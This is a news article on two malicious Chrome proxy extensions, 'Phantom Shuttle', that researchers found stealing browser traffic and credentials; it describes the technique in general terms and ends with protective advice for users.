Malicious Chrome Extensions Steal User Data for Years Before Removal
WASHINGTON, D.C. — For nearly a decade, two malicious Chrome extensions known as “Phantom Shuttle” quietly siphoned sensitive user data by rerouting web traffic through attacker-controlled proxy servers, security researchers revealed. The extensions, which masqueraded as legitimate proxy and network speed testing tools, were available on Google’s official Chrome Web Store until their recent removal following exposure by cybersecurity experts.
Researchers at Socket discovered that both extensions, published under the same developer name, had been active since at least 2017. Marketed primarily to foreign trade workers needing to test internet connectivity across regions, the extensions were subscription-based, charging users between $1.40 and $13.60 for their services. At first glance, the tools appeared legitimate, with functional descriptions and reasonable pricing. However, their true purpose was far more insidious.
According to the Cybersecurity and Infrastructure Security Agency (CISA), the extensions covertly rerouted all browser traffic through proxy servers controlled by attackers. The malicious code was cleverly concealed within what seemed to be a standard jQuery library, and the extensions embedded hardcoded credentials using a custom character-index encoding scheme to avoid detection.
Once installed, Phantom Shuttle dynamically altered Chrome’s proxy settings via an auto-configuration script, forcing all requests to pass through the attacker’s infrastructure. The extensions intercepted HTTP authentication challenges on visited websites, enabling them to capture usernames, passwords, credit card details, session cookies, and other personal information submitted through web forms. The proxy network targeted over 170 high-value domains, including developer platforms, cloud service dashboards, social media sites, and adult content portals, while excluding local networks and the attackers’ own command-and-control domains to evade suspicion.
Google responded by removing the extensions from the Chrome Web Store after researchers publicly disclosed the threat. The company’s security team emphasized its commitment to protecting users from malicious software and urged users to review their installed extensions regularly. This incident highlights the ongoing challenges faced by browser extension marketplaces in vetting and monitoring third-party tools.
The Federal Bureau of Investigation has previously warned about the risks posed by malicious browser extensions, which can serve as silent spies by hijacking traffic and stealing data without users’ knowledge. Experts recommend that users only install extensions from trusted sources, keep software updated, and employ multifactor authentication to mitigate potential breaches.
For more information on protecting against browser-based threats, the United States Computer Emergency Readiness Team offers guidance on safe extension use and identifying suspicious activity. This case serves as a stark reminder of the vulnerabilities lurking in seemingly harmless software and the importance of vigilance in digital security.
Leave a Reply